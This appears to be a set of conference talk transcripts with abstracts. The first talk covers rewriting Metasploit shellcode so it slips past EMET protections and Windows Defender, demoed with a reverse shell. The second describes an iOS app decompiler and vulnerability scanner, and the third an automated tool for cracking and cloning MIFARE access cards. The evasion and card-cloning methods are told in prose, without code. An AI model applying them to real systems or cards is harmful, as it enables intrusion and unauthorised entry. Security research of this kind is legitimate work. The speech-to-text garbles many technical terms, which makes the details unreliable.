And so he went crazy with this. He was using it everywhere, like everywhere. However, we tried using a PowerShell, which I thought personally was strange because if you're running PowerShell you have full access to the Windows API anyway. But sometimes his POCs have small constraints. So it didn't have low library in the import table. So we started talking about it and we were going to use a loaded module, another DLL in memory. And so he wrote in addition that used the same 4 bytes hash to find DLL in the loaded modules. So you would need to know your target. He borrowed code from the Steven Führer hash API stub. And so the Havoc protection to defeat this, because we did DLL.name. That's what we were using, not just the short name because that wouldn't work. You would actually have to throw up or not throw up, but insert many, many DLLs to cause a collision. And what you're going to see is there are many DLLs at work. So we were both happy with this. So we had two stubs. And we started talking about it. We're like, we knew by this point that if you had get process address anywhere in your module space, any DLL, you could get low library A by getting the kernel 32 handle and then call and get process address with a string load library A. And then you have full access to the Windows API. So then to bypass caller, what we did is we load library A's in EAX, then we would move it, we would push it on the stack and then move the pointer TVX and then we'd call it through an indirect pointer. So now we had four stubs that we could use. So that was pretty good. We were excited about that. But I wanted to know where I could use them. So I wrote some scripts that would go through and find anywhere in low library A and get process address was on a Windows system. These were clean systems, nothing really installed. There is going to be some overlap because you have sys file, you know, system 32. But this is a lot. And you can see that Microsoft has made a concerned or somewhat of an effort to decrease the library A and get process address in the import table, which is, you know, pretty cool. And so we had a lot of information. We thought this was cool. So we're going to submit to a conference. And this was about May. And we were like, all right, I think we're ready to submit. And then June, my world fell apart. There was the Angular exploit kit that used get process address from user 32 import address table and fire. I published it and I almost retired. I was pretty depressed. But we decided to go ahead with a blog post because we wanted to release the POC. And one of the things that we had in the POC is we had a dependency walker style. What we would do is part of the script. You give it a binary that your target is and it would use the output from my scans of load library across all these systems and you give it an operating system. And it would go through and recursively look at what is loaded in every DLL. And it would give you an option of what, or not option, but it would tell you what DLLs to use. And so it ended up statically, right? So that was actually kind of cool. But when we released it, we left kind of a bug. We didn't put an exit function. So there was a reverse DCP shell and no exit function. So it crashed right away. And that was definitely by design. And so we talked about it. We're like, you know, we want more payloads. We want to be able to basically reuse what Metasploit has, but it's going to take a lot of work. And I said, you know what, I'm going to do this. I got some ideas and that brings us to the fun part. I had two ideas. First, I was going to remove the steamfuehr hash API stub, replace it with something that I didn't know what. Okay. Or I could build something that would rewrite all the payloads for me. And unfortunately, I decided to rewrite all the things with automation. And so Metasploit payloads follow a specific pattern. It basically works where you push everything onto the stack. This is for the x86 side. The x64 side is very similar, but just different calling, right? So the last thing you push is the actual hash. And then you can call EBP. Pretty straightforward. And so I devised this workflow. My script would take input either via stand in or from file. I would disassemble and I use capstone because I use capstone to bdf and it's really easy to use, right? And then I would capture the blocks of instructions. And so every instruction I would tag with a unique identifier saying, all right, so this is part of this block. So I had everything. I would capture the APIs. I would capture control flow. I would actually go through and when I see a control flow statement, I would give it a unique identifier. And then I would go back through and find the location where that was. And I'd slap a unique identifier on there so I could kind of figure out what was going on without having to do emulation. And I had to protect low library and get process address from being clobbered throughout the entire payload. And I had to figure out how to do that with automation. And I went at it for five days straight, 12 to 15 hour days. And when I solved the problem, more popped up. Because there were some payloads that weren't very straightforward. They had conditional statements. They would have conditional loops. And I was crossing the threshold where if I would just sat down and wrote these payloads out, probably in that amount of time, I probably could have knocked out 15 to 20 at least because I could have some efficiencies, gain understanding, meet processes. So I decided just to burn it down. I'm like, I'm done. I'm going to go to the original idea that I had, the first idea. And that was to replace the impure hash API with something else. So what I came up with was this is the original, right? We have the hash API plus actual payload logic. And I decided to use the import address table stub and then offset table. And because you have to translate the four byte hash to something, if you're not using the export table, you have to figure out what it is. So what I did is I took all the APIs and then I unique them, put them in a string. So, but I had some requirements. I had to keep it, had to be useful in read execute memory, not just read write execute, in case I put it into an executable where the section was only read execute, right? So no encoding within the payload itself without moving it to a stack or some other location. And try to keep it as small as possible. Now, import table parsing is much more expensive than export table parsing. And I had to support any Metasploit shell code that used the former hash API. So the first four steps are the same, right? Take input, disassemble, capture blocks, capture APIs. So I reused some code. So that was good. But then I had to build a lookup table and then I had to find the appropriate import address table for the executable. And then I have to have appropriate output for whatever you need it for. So the offset table approach works as follows. You can see here you have four byte sections followed by two byte, one byte, two blocks. And the first byte is the DLL. That's the location from that point to the ASCII or the ANSI representation of what should be called. And the API, same thing. So this is an example of a string. And so all these are null terminated. It makes it very easy once you push it onto the stack. And you get some code reused out of this because I unique the string so there's no repeats, right? So you see here this is calling kernel 32. And the next API is when exec. Then I'm calling kernel 32 again. And the next API is exithread, so on, so forth. So there is some reuse. And I thought that was going pretty well. So this is the code. Pretty straightforward. I think everybody understands it by now. But so how it worked was you jump over the lookup table. I checked the first hash in the lookup table and then I continue until there's a match. And it found I move the DLL offset to AL. I normalize and use low library to get the actual, to load the DLL memory. And then I will save the DLL handle. I'll put the API offset in AL on normalize. Then use get process address to get the Windows API handle. And then I have to repair to call the Windows API. So I clear the stack. I save EAX down the stack so then when I do a pop AD it ends up back in EAX. I save the return address to EBP because it's not clobbered. And then I call the Windows API by calling EAX. On the return, when I come back, I fix up the EBP to point back to the beginning of the import table stub. And then I return back to the payload logic. So if you're going to look at it from like a, just an image, you can see here I'm going to do a call over. Just like Steven Fierce hash API or the Metasploit payloads. I do a call over. And then I pop EBP. Well, at this point it is the Metasploit actual logic of running the show. So then I return back into the import address table stub. And I try to not go back to the beginning of the stub every time. I try to stay within, just go to the lookup table. And with all the different payloads, even I got it down to one register where I could push the two values, low-lubbary A, and get a process address onto the stack, and call from one value, just do an offset plus one or plus four. But the problem was is that it would just get clobbered when I went to a more complicated payload. So I have to go back to the beginning of the import address table finding stub. So then you will call, I would actually do a call instead of a jump to the Windows API, return back into the lookup table, and then do a return to the payload logic, and then continue until there's no more payload logic. Right. So the initial POC only took 12 hours to make the offset table, to design it, everything, took about 12 hours. Adding the workflow, yeah, it took about another 12. Finalizing the tool, you don't even talk to me about it. It took a lot of time. But I'm happy where it's going. And what's really fun about this is now the API hashes are, besides getting them the first time, now the API hashes are completely meaningless. After I figure out what APIs there are, I can do whatever I want with them, and come to find out that antiviruses depend on them for signatures. Yeah. And I can, you know, think about what happens if we mingle them. So I added the ability to mingle the hashes. So let me show a demo of that. So the first thing I'm going to do is just run MSF Venom, do a reverse TCP shell, and I'm going to put it into a straight binary file. Just normal binary output. All right. Now I'm going to use FIDO, I call it FIDO. I'm going to cat the, I'll put the binary format into FIDO, and I'm going to call low library A, get process address, and that's for the main module. And because I'm targeting a certain binary, I know that low library A, get process addresses in the import table of executable that I'm targeting. So you can see here that I stripped off Steven Führer's hash API call. This is simple to payload, and I print out what APIs are being used. And then I show the string table, just kind of a check, and then I go through and do all the rest. Now I'm going to use Backdoor Factory to append a section and throw it on the VM. And of course, AV flags it right away. This is Windows Defender. I'm going to do the same thing, except I'm going to use dash m for mangle. You can see I go through and show that I'm mangling each hash. And then what I do is I go into the actual payload logic and I update the hash as the match. It did not catch it right away, so I set up a net cat listener. And there you have it. All right. So as you already know, this is called FIDO, just because I couldn't think anything creative. So it accepts stand in, and it will process the payload based on target executable, and that will be in the next demo. Or you can provide, if you know about the target executable, you can provide what you want to use. So if you want to, you know it has a get process address, you just say GPA. And then you can actually, with slash B, you can provide the target binary. It will go through and do a dependency walker style recursive look at all the DLLs. You can get a target OS because it does matter. And I have XP vista 7, 8, and 10 with all those dependent, like with all the low library stuff. I do need to update it based on stuff I found within the last couple days, which is pretty exciting. And then you can either take stand in or you can give it a code. And I'll show you what D and L stand for in a second. But yeah, we'll go over that. And then you have different, you can, you can mingle like I just showed, you can have different outputs such as C, Python and C sharp output. And the normal output is stand out binary format, raw binary format. And you can pick your parser stubs. And so you have GPA, LL, GPA, low library, get process address. And you have extern. So if you're going to use an extern, you need to know what DLL you're targeting that's in memory and what import table or what part of the import table. And there's only two options. And so with testing, I had a lot of issues with some core DLLs, like on Windows seven. And I was building a blacklist just to avoid them. And it kept growing. And I was starting to worry what was going on. And it was only, like I said, Windows seven through 10. And if you, if you look, you see kernel 32 there. And I thought it was weird that kernel 32 had get process address. And it's import table. So I just ignore it. I thought it was just a bug. Come to find out it was the API MS win core DLLs. And these are the exposed implementation of the Windows API. And they've existed since Windows seven. And get process address is implemented as well as low library. And I'll go into that in a second. But get process address is implemented in the library loader. There's, there's like some letters and some numbers behind it. DLL. And they're normally used in system DLLs because it's for portability reasons. And they're, it's in every process. Like these are in every process. And it's predictable. They are, they are, and you can use them if they're in the import table of a DLL. Yeah, I tested that. And it's, it's actually pretty cool. And it's everywhere. It is, I don't know if I can state this enough. It's in every process because it's in kernel 32. So there's a view of kernel 32. You can see the API MS win loader, or win core library loader DLL. And you see get process. And it's in the import table. So let me just explain kind of what, what we're talking about here. All we need is get process address in any DLL import table to access the entire Windows API through import table parsing. Since Windows 7, there's been get process address in kernel 32 import table. So we've had a very stable EMAT, EAF, and caller bypass opportunity since Windows 7. Which is, I haven't heard anyone using this. So I think this is pretty cool. And by the way, get process address is nothing but only one. Because within the library loader DLL, there's also library, or load library EX or extended, I think that means extended, EXA. And the difference, they're basically the same. Low library A is low library EXA with a zero as a third flag. So that's what, when you call it low library A, that's, that's what's being handled. And this is completely reliable on Windows 7. I found, I don't have a Windows 8 VM on me right now. I can't test it, but it's not reliable on Windows 10, not yet. And, and yeah. But you can, you can actually use this. It's pretty great. So I have a demo with the Tor browser, the recent one. All right. So for, what I'm going to show you here is I went ahead and disabled the stack pivot check. I'm going to run the original exploit. Show you that EAF gets flagged. Okay. You can see at the bottom there. Now, if you were to bypass EAF and caller, we get flagged. Unless you were to completely bypass or change it. So let me just point this out real quick. So what I did is I get, I took the Firefox executable. That's what Tor browser is using. I did a slash B. And what it did, what my script is doing right now is checking for Windows 7 compatibility. And I'm going through and, and actually doing the recursive parsing to figure out what would be loaded in memory. Now, it's not going to look at the, the custom DLLs that come with Firefox. It's just looking at what is in the system. So the output, as you can see, it'll show the, what low library, low library and get process minors are available. So these DLLs have these two APIs in their import table. And then you'll see GPA binaries available. And you can see that I've outlined the API MS win core DLLs. And so you can use these. And I, I think that's what I'm going to do next in the, the video list. So I'm going to use kernel 32. And I, I am, yeah, I'm using kernel 32. And it's using X-turn GPA. So I'm using the get process address in kernel 32 in the API MS win loader DLL that's in the import table. And what I'm pushing that through, I call it the Tor browser encoder. It's because it needs to be a JavaScript object. And so I'm just, it happens to be a Python list. And so I just print the Python list. And I'm, what I, what I did here next is I just put the, put the list there in a JavaScript script. And then I've already copied it over. So I'm going to come uncomminent and then execute the payload to demonstrate that EAF was bypassed. EAF and color. There you go. All right. So there are some issues, not necessarily with my strip. So if you're using Metasploit and you're using your, you have Emmett, right? So my, my, my, my API is compatible with Metasploit. And I'm using the same interpreter with the stage payloads that have the hash API call. The problem is Emmett, right? So whenever you get a stage payload coming back over the second stage, if you're, you're doing multi-stage, it's going to have Steven Führer's hash API call. So it will fail. So Metasploit needs to be, to, to make this fully compatible, you need to run, run your own version of Metasploit or, or we update Metasploit. And it will take a lot of work. I also have to do, for parity, I have to do Windows X64 side of the house. So yeah, that's, that's pretty much all I have. As far as control flow guard, return flow guard implications, I cannot make an intelligent assessment on that at this point. I don't know enough what the impact could be. So the code is going to be there. I'm going to release it here in the next couple of minutes. Any questions? All right. Well, thanks.
|
Metasploit x86 shellcode has been defeated by EMET and other techniques not only in exploit payloads but through using those payloads in non-exploit situations (e.g. binary payload generation, PowerShell deployment, etc..). This talk describes taking Metasploit payloads (minus Stephen Fewer’s hash API call), incorporating techniques to bypass Caller/EAF[+] checks (post ASLR/DEP bypass) and merging those techniques together with automation to make something better. There will be lots of fail and some win.
|
10.5446/32394 (DOI)
|
Hello, my name is Igor and heroism is Linares and Yuriy Slav. Our team does de-compilation and de-fuscation and has experience with most of the common architectures. We also do code analysis, source and binary, including a pentestine manual static analysis, and we also develop analysis tools. In today's talk, we would like to tell you about one of our analysis tools. So we were doing quite a lot of manual IOS security analysis and a significant part of the analysis process was the same from application to application. So we decided to write a tool that will do most of the work for us. Our goal was to develop a tool that would take an iTunes application link as an input and give us a security report and a record code as an output. So here is our plan. First we would like to obtain an application binary. Then we will translate this binary into some internal representation, analyze this representation for security flows, and then translate it into human readable pseudo code. This last step is important because we want to show each vulnerability in some human readable context. Okay, and the first part is how to get a binary. So getting an application binary is not as trivial as it may seem because all IOS apps are distributed through Apple App Store only and the binaries in the App Store are decrypted. Moreover, the only known way to decrypt an App Store application binary is to start the application on an IOS device, let devices processor decrypted and load it into memory and then dump the decrypted binary from memory. To make this work, we will need a jailbroken IOS device. And as we anyway need a jailbroken device to decrypt the application, we can use it to download the application as well. So this whole step, getting a binary, will be done on the jailbroken IOS device. So let's quickly review what we can do on a jailbroken IOS device. Of course, none of this is available on a stock IOS device without jailbreak. First of all, we can connect the device using ECCH protocol and get a nice bash command line. What is more, there is a code injection platform called CDSubstrate and it provides an API to call any method from a runtime of any Iranian IOS application and also allows us to hook any such method and change its implementation. And finally, there is Clutch out of the box tool to decrypt and dump IOS applications. So we decided to go with the highest level possible and just use graphical interface when convenient. That means that now we need to first figure out a chain of method calls and GUI decisions to initiate and manage the load and then figure out how to make needed GUI decisions programmatically. So in order to do that, we need to work with two built-in IOS applications, Springboard, App and App Store App. Springboard is a central application in the IOS graphical interface. So we needed its runtime to make our GUI decisions, like doing with some system other stuff. We also need to use App Store runtime to initiate the load. So we figured out this stuff and home to this chain of method calls. First of all, our tool unlocks device. Then it uninstalls the labs to make space and then opens an iTunes page like this one with target application. Then at this page, we need to press this get button. After that, App Store will ask us to sign in and there will be some alert and we need to fill our login and password and press OK. Then the load will start and we'll wait until this get button become open button. Meaning that the application was downloaded and that we can come to the final step and decrypt it with Clutch. So now let me just show you how it's done. OK, so here I have an iPhone, this one, and the screen shows here. So I'm going to launch my script and see what happens. Now we need to wait a little bit. And that's it. And now it's complete. So that's how it works. OK, and next part is what we do after that. We are going to translate the decrypted binary into intermediate representation. So as soon as we get the decrypted binary, we need to translate it into the intermediate representation that is suitable for analysis and representing results of vulnerability search. As most translation tools, compilers as well as the compilers, we decided to use an intermediate representation that is more high level than the binary code, but more low level, that's source code. To obtain precise results, we have to deal with following challenges during binary translation. In particular, we have got a lot of things to recover. First of all, we need to separate functions from the data and attach names to these functions with correspondence to the function names from the source code, if possible, of course. For example, if the source code contains a function that disables certificate checks, we have to know its name to understand the source code semantics. Otherwise, it will be very difficult for us or even impossible to find vulnerabilities in such code. Moreover, we have to understand what arguments are passed to the function, and also we should know the values and types. Based on that information, we have to recover the original semantics of the program inside the IR, including the control flow graph of the program and the flow of the program. The majority of the source code is written in Objective C or Swift, so we have to recover runtime information interfaces from the binary file, that is, classes, interfaces, protocols, and other stuff. Applications are mostly FAT binaries that contain at least two executable images for the ARM architecture and for the RR64 architecture. At first, we supported translation for both ARM and RR64 architecture, but now, as developers and mobile platform owners are mostly focusing on the RR64 architecture, we have abandoned the ARM architecture support and do not support it anymore. Well, as I said before, we had to pick some intermediate representation that is suitable for representing binary program semantics and suitable for security analysis. So we decided to use the LVM as internal representation of a recovered code. LVM provides a handy static single-assessment-based intermediate representation that is well suited for representing C family programs, including Objective C programs and even Swift. Moreover, we can run multiple analysis, built-in LVM for program transformations and optimization, including the LES analysis, many of them, dominators, tree builders, loops analysis, and other transformations and optimizations. Also, we have much experience with this representation, so LVM was the perfect match for us. There are basic ideas that we implement in our translator. We implemented a high-performance tool that translates iOS applications to LVM. It can recover functions and function calls, arguments of that functions, and function types, recover control flow graph of the program, and reconstruct types and variables. During the translation and analysis, we also used all information about class and interfaces we were able to recover. This is the basic picture of how it works. Our tool receives binary application as input, passes the image, and creates an application memory model. Based on this memory model, we can extract information about classes, about functions, and recover the control flow graph of the application. To analyze this data using various algorithms based on the information we recovered before and based on the data flow of the program. So this is how we recover variables and even the types. After that, we generate the LVM representation and optimize it for better results. In the image-facing face, the decrypted binary is unpacked if necessary. The file format that is used for executable in iOS is called Mako. The Mako binary format was well-decommended until Apple removed the documentation from the public access. In the Silphriot and Mako parses, we extract information about program symbols and pass runtime information, as well as information on classes and interfaces of the application for both Objective-C and Swift. Once we pass the image, we start the process of recovering functions and the control flow graph of the program. For this purpose, we developed an iterative-requisite algorithm that takes a work list with addresses of functions starts as input. We use the following sources of function start addresses. There are entry points, addresses from the function starts section, function addresses obtained during runtime parsing. For example, function addresses from the Objective-C class definitions or virtual functions addresses from Swift or C++ virtual tables. The algorithm recursively traverses all the functions at known addresses and creates a control flow graph for each recovered function. We also have to take special care of trumplings and tail calls. Here you can see an example of trumpling for function of C release. During the translation, we replace this trumpling with a call to the real of C release. Once in ARM, often end with a tail call, which also should be accounted for in the CFG recovery. This is an example of an idiomatic code for the IS application. Function concludes with a tail call to the series. So we should take special care about it. As I mentioned earlier, we recover the information on interfaces of Objective-C and Swift classes. In particular, we are able to recover classes, protocols, method names, signatures for Objective-C classes for Swift. We can only recover the class hierarchy and create virtual tables for these classes. All our information on Swift classes is lost during compilation, so we are unable to recover it. We also implemented our own demagnar for Swift symbol names to make translation results more human readable. So there is an example of Recovery Objective-C interface. And there is an example of Recovery Oxygen information about an Objective-C class. There is encoded signature for each method of the class. We can decode the signature to get precise information about argument types and the region time type of this function. This slide shows us an example of Recovery Swift class. It's worth mentioning that we are unable to recover anything but class names and virtual tables. Even function names are missing and cannot be recovered from the binary. So as after we obtain the basic information about the functions, we run a series of analysis to get more precise information about the semantics of the program. During analysis, we recover the memory objects used by the program, such as temporary variables, local and global variables, and most importantly for security analysis strings. We also recover types of variables and arguments. In our current implementation, we only support integer, float, and pointer types. But we are currently implementing the recovery of complex types, such as arrays and structs that has been already implemented in another hour in binary to LVM translation tool for the N-tool architectures. We can get more precise results using the knowledge base of known function signatures, for example standard library or widely used libraries like OpenSale and others. Moreover, the function signature information for Objective-C methods is encoded in the binary so it can be recovered and propagated during type recovery. Based on the obtained information, we generate an intermediate representation that preserves the semantics of the given program. The obtained model is optimized for further analysis. For example, we remove the code and run constant propagation paths, which is very useful when analyzing the function arguments. So let's see an example of ARM 2.0 LVM translation. This slide contains an example of an Objective-C function. It's actually a part of the function in a binary application. And this is how this function was translated to the LVM. So as you can see, we recovered names of called functions and precise argument types. And finally, this slide contains the control flow graph of the recovered function. So this is how binary recovery and translation is done by our translation tool. So, we have an LVM bytecode and we want to find vulnerabilities in it. At first, we decided that it would be better if we show our detected vulnerabilities in some human readable context. So we developed a tool that recovers some Objective-C suite-like pseudocode from LVM bytecode. The ultimate goal of this work is to develop the compiler. But for now, we are extracting all the information we can get from binary code. Names, signatures, call sites, arguments, type, statements, et cetera. We are improving structural analysis, which includes precise recovery of loops and if-else statements. It will make this tool much closer to the compiler. In SIEV binary code, we have less information than in Objective-C binary code. For example, we have no functional names. So Objective-C recovery is more accurate. But in most cases, there is enough information for interprets the detected vulnerabilities. When the application uses SIEV, it's binary contains both Objective-C and SIEV functions and during the binary translation, we determine which function is written on what language and we propagate this flag to the pseudocode. So depending on this flag, we use Objective-C or SIEV to print. Our research shows that the most dangerous vulnerabilities can be usually found by pattern matching. Also, pattern matching is fast, so it is important for large binaries. So we use pattern matching on LLVM for now. For other vulnerabilities, we will develop other data flow analysis algorithms, for example, sustained analysis and we have done it already for X86 architecture for detecting memory management bugs and formant string vulnerabilities. We find vulnerabilities in LLVM bytecode, so we want to demonstrate these vulnerabilities on pseudocode and we map LLVM instructions to pseudocode line numbers. So when we find some vulnerable instruction in LLVM bytecode, we can locate this vulnerability in pseudocode. So let's discuss vulnerabilities we can detect now. First of all, iOS applications can transfer some sensitive and security-critical information via non-protected connections and it makes this application vulnerable to many of the main data attack. Most of applications from our research, they communicate with main web server like banking applications and to this type of vulnerability is very important. For example, application can turn off SSL certificate check. It often happens when developers forget to remove the test code and we can detect such functions. Also application can use HTTP protocol to transfer some utility data, for example, maps and use, etc., some information and this data can be tampered with and it can help attacker to make a phishing attack or to change some application logic. We detect all constant strings in binary and so we can find these connections. I sometimes use applications, sometimes use insecure cryptographic functions like hashing, ciphering, cd random number generators, etc., md4, md5, trucode des, whatever. Also application can use hard-coded encryption key and the attacker can reverse the application, get this key and use it for sensitive data disclosure. So we can match these function names and find these vulnerabilities. Server application can gain access to base board so developers have to turn off its usage, especially for important data. The common error is not to turn off NSLock usage. Information in lock can help attacker and this information can be simply viewed in export if you take your device to computer and even don't need a jailbreak. Finally, application have to implement function which describes behavior in background mode. Otherwise, the screenshot will be saved in application directory. This screenshot can contain some sensitive information like credit card numbers, telephone numbers, etc., and information which is stored in application directory can be stored. Then in iOS, developers can use reflection. They can call some methods by its names and this way they can gain access to private API which is prohibited by Apple and is insecure in some way. There are some important vulnerabilities that we don't detect now. All the information that is stored in application directory can be stolen. For example, if attacker have physical access to device or these devices are jailbroken. Application can store sensitive and uncupert sensitive information or some security critical information in application directory, in preference files, in some local databases, or in network cache. The important thing here is that in secure data storage it is dangerous not only because that it can lead to data leakage but also that this data can be tampered with and if this data is important, for example, if this data defines some application behavior, the attacker can change this behavior. For example, we met across the application which stores its main web server address in preference files so the attacker can change this address from HTTPS to HTTP and to carry out the main media attack. The other example is when application stores the unsuccessful authorization attempt number in preference files and this application become vulnerable to brute force attack. Poor data validation vulnerabilities is less important for iOS application than for web application but it still can be found here. Both poor data validation vulnerabilities and sensitive data leakage can be found by data flow analysis. We can track, we must track the sensitive information through data flow. The main problem here is that we can, we must determine which information is sensitive. So how can we tell that this variable contains, for example, passwords? We suggest some heuristics, for example, using, of course, variable names, then data ciphering, then some API functions as sensitive data source and, for example, some elements of interactive analysis to ask user which information is sensitive. This work is in progress. Then each application which operates some sensitive information shouldn't work on JVolkan device but the standard algorithm of JVolkan detection can be bypassed. So we can detect this algorithm, the application of this algorithm in binary code. I think the most important class of vulnerabilities here is authentication vulnerabilities, no two factor authentication, weak person complexity requirements and weak control of number of successful authorization attempts. This vulnerability is hard to detect, to be detected and usually they should be detected on server side. We have implementation for some server side and for Android applications and we want to apply these ideas to iOS applications. The main ideas of our approach is following. We detect the counter which is responsible for successful authorization attempts number and we detect password validation function and fuzz this function to recover its complexity requirements. Here is some piece of the demonstration. Here we show some assembly vulnerable snippet. In this snippet we call vulnerable function, function that turns off certificate check. Then we translate this code to LLVM, here is our call and finally we have this call and we see that the argument is one. So it's vulnerable in our studio code. So we have analysis report, this XML, we see what the source file, the line number and the vulnerability name. We use this tool for some bunch of applications and here is some statistics. We can show of course, this statistic represents the current states of our tool. Of course we have false positives. As I said, we will enhance our analysis engine but our tool shows these statistics and let's see. We presented our tool set. This tool set can find vulnerabilities in iOS applications only using its iTunes link and represent these vulnerabilities on human readable studio code. The future work is to enhance analysis, to develop data flow analysis algorithm, paint analysis, etc., to reduce number of false positives and to make our studio code closer to source code. So to develop a decompiler. Thank you for your attention. Any questions? Not a question, just a comment. We thought about finding in the body of binary API keys for example for Amazon or other services. If you have API key, you can use the server and sometimes some developers they include not only these keys, they include also private keys for SSL. It happens but we don't detect it automatically yet. Hi first great tool. Do you have any plans on releasing it? The source? No, fortunately it's a proprietary tool. Okay and so you showed some statistics on how many apps. Is that statistics based? A couple of hundreds. And then I was just wondering a lot of apps will introduce full SDKs so there will be maybe two or three functions for SSL pin checking or I don't know other functionalities obfuscation. Are those things taught about in the tool? For example if banking applications will use official SDKs for example, let's say and they have functionalities which are in the SDK so you will have SSL pinning which is a functionality in the SDK but it's not because it's in the source or in the binary that the application uses it. Do you see what I mean? Not quite sorry. Yeah okay, well no problem. No no problem oh well. Thank you.
|
The main goal of our work is to find out a sensible way to detect vulnerabilities in binary iOS applications. We present a new fully featured toolset, that constitutes a decompiling and analyzing engine, targeting ARM/AArch64 programs, particularly iOS applications. In general, the analysis workflow consists of four steps: Downloading and decrypting an iOS application from AppStore. We introduce the iOS-crack engine that is capable of automatic downloading, decrypting and dumping memory of AppStore applications using a jailbroken device. Decompiling the iOS application. The toolset is capable of carrying out a completely automated analyses of binary programs, using the LLVM as the intermediate representation language. Unlike known binary code to LLVM translation tools, our decompilation tool aims at a high-level program semantics reconstruction. That is: program CFG reconstruction, advanced analysis and propagation of memory objects and stack pointer tracking, data types reconstructions, program data model construction. Almost all iOS application are written in Objective-C or Swift, so we also take care about precise types reconstruction and use the runtime types information in decompilation process. Static analysis of the iOS application. We introduce our static analysis framework that is able to find all common vulnerabilities of mobile applications, especially iOS applications. Representation of analysis results. The toolset is able to produce a human-readable pseudocode representation of the source binary. During the presentation we will demonstrate our analysis engine in action. We will show real-world examples of the most common security flaws and how they can be found.
|
10.5446/32395 (DOI)
|
So my name is Kevin Larson. This is a talk on my for classic cracking and it's not going to get in just to what maybe many of you already know. Have you heard of MFOC? MFCUK? A few people. Alright. That's been around for quite a while so the my for classic cards have been able to you can clone or crack them with free open source tools. It's been around for quite a while but a little bit about me. I'm a software engineer at Honeywell. The disclaimer this is all my work for my master's degree. Nothing to do with my employer. Also a note I'm not disclosing anything that's brand new that's not out freely available on the web so NXP hopefully can't come run after me when I leave. The my for classic card is just in essence it's really just a simple storage device. There's read write access per block and this is used for things like eWallet access control transportation systems. Getting in and out of your hotel and if you notice maybe at your hotel if you wanted a late checkout they might say you have to bring your hotel card down to the front desk. We'll re scan it and you can check out an hour later. What you can really tell by that is there's some things that are they're not networked. They're not doing server side checks. There's local checks being done based on the data on the card. The my for classic actually used a custom crypto library called crypto one and the core of that has been broken for quite some time. A little background on my for the memory layout. This is a 1k card. So there's 16 sectors with four blocks each and there's a key A and a key B depending on if you want to read or write data for each block. So for a typical card there's going to be some default information that the manufacturer wants you to be able to read in order to get into the door or just know what the card is. Then there may be some encrypted data like the check in check out time at a hotel or things like that. These really are card only attacks. So what that means is I don't need to be there's there's separate different attacks if you can actually stand next to a reader with a card and watch someone actually trying to authenticate. This is only if you have the card by itself or if you're next to maybe someone on a subway if you're in extremely close proximity. So what we're really using here the basis is NFC tools for my for classic MFLC and MFCUK. MFLC relies on the fact that you know one key on the entire card and based on that you can you can do some attacks to get all the keys on the rest of the card. In practice there's almost always one default key of all F's just so you can read the card type and the size and things like that. There's also another tool called MFCUK if you don't know any keys on the card. It takes a lot longer. It's not quite as practical and it's very rare you'll actually need that. So NXP responded to these tools after a while with the my fair plus card which has an AES option. What that means is that they really wanted to be able to allow people to update their readers in a building or a transportation system while still using the old cards and updating some readers and leaving some at the same time because it's too expensive for the infrastructure cost to actually update everything all at once. What this means though is that you may be using AES for some readers but you're still using the old system with the crypto one custom library for old readers. The other thing they did do is they fixed the suit around a number generator so it's not vulnerable to MFCO or MFCUK. So I don't know if any of you using that and you have a new card you're trying to use and it's not working. You can sit and try all night it's not going to work. So what they've done is they fixed this so it's a little bit more secure. So there's been some research done by Carlo and Roll. They found new card only attacks for the my fair plus in SL1 mode. SL1 means that you have the old crypto one library being used for the old readers along with potentially another block on the card using AES. This is important because most installations did not completely reinstall all of their readers. So my goals really were to reproduce the attack and see if I could make it faster. See if I could make it real time. Could I really bump into someone like you see in the movies? Could you bump into someone on a subway? Actually copy their card follow them into work things like that. So some of the hardware tools I used was the SCL 3711. It's just like a $30 USB reader. The Proxmark which gets a little bit more expensive but has a very active community. So that was really a useful tool to learn the core of what I needed to do. My fair plus cards and the reader with config software to actually take factory fresh cards configure them like a hotel might or a transportation system. And then I bought this crappy eBay lock for $80 off eBay. If you want to get checked by TSA put one of those in your check bag. One other thing to note is that the mistake I made in buying this is actually not all my fair classic readers except my fair plus as was intended. The my fair plus card takes a little bit longer for the authentication. So this lock actually doesn't even work with my fair plus cards. So the new attack is it's dubbed the hard nested attack because it's it's an extension of the existing nested attack on my fair plus cards which have a hardened PRNG. It still requires one known key and what you do is you take you do many attempts at a nested authentication. You collect the encrypted unique encrypted nonces between the known sector you have the key for and unknown sector you're trying to get the key for. With enough of those tries there's some leak bits and you can you're basically trying to do is reduce the key space from like two to the 48 which is a my fair classic key size down to about two to the 20 maybe a little bit bigger but then from there you can do a brute force. So what did I actually do? I tried to improve the attack but but really there's there's people who don't sleep and a lot smarter than me who work on this all the time and they basically reduce that down to almost the physical constraint of just the time it takes to authenticate a card to the reader. So my goal is really just to make this easy to use. It took me a month or two of you know my spare time and a fair amount of money to get this up and running so I figured if I can do it for 20 bucks and no one has to type in a single command then maybe it'll get used a little bit more. So the point of this is I think everybody's lazy I'm lazy. If you don't know if you have a my fair classic or my fair plus you don't know what kind of pseudorandom number generator it has you don't want to spend $200 or a month trying to figure this out. All you have to do is download this there's a installed script and you can run it with no arguments to find the keys on your card. So really what I did here is I modified the libNFC version of MFOC to identify if it has a new pseudorandom number generator which is not vulnerable or the old one. I modified the libNFC version of the hardness of the attack to just hold on to some more information so I can automate this and you don't have to figure out what keys are unknown and type in more parameters. I also created a wrapper script to just figure this all out so you can just run it with no problem. So here's a kind of a static demo of what would happen if you were running if you didn't know if you had a my fair classic or my fair plus. You would just run mylazycracker the script and the first thing you would see is it would kind of identify do you have a my fair or do you have a my fair plus card and from there it will pick which attack to use and in this case it's a my fair plus and it will highlight what keys are unknown in what sectors and it will just recursively go through and find those keys for you. So in this case it makes it known it says PRNG is not vulnerable to the nested attack so I'm selecting the hardness of the attack. In the red there it's selecting the parameters for you so you don't have to understand what really that is. What that's actually doing is saying I know that sector block 60 and key B is all zeros. You can use that to try and authenticate to another unknown sector 48 key B and try and crack that. So as it goes through it's finding each key for you and in the red you can see that there's it's finding separate keys for key A and key B and there's still one key left. Sometimes the attack does fail. It tries to reduce the key space down to a certain size and due to some math I don't understand it gives up once in a while if you just try again it seems to work. So in this case it's found three keys and once you've found all keys for all sectors it just dumps it to a binary file and from there you can basically clone the card with a lot of with NFC classic open source tools included in the script I made it it'll just ask you do you want to clone it yes or no so you can just put a blank card on there as well if you want to if you want to copy it and you have a clone of the card. The key for the that you would need is that the UID on a myFlecht classic card is read only and there's some Chinese magic cards which allow you to write to that sector so you do need to buy you go to Alibaba or something and buy some magic myFare plus cards or magic myFare cards. So the source code is released it's here it's on GitHub it's been tested by a few people if you guys ever go to Troopers in Germany and 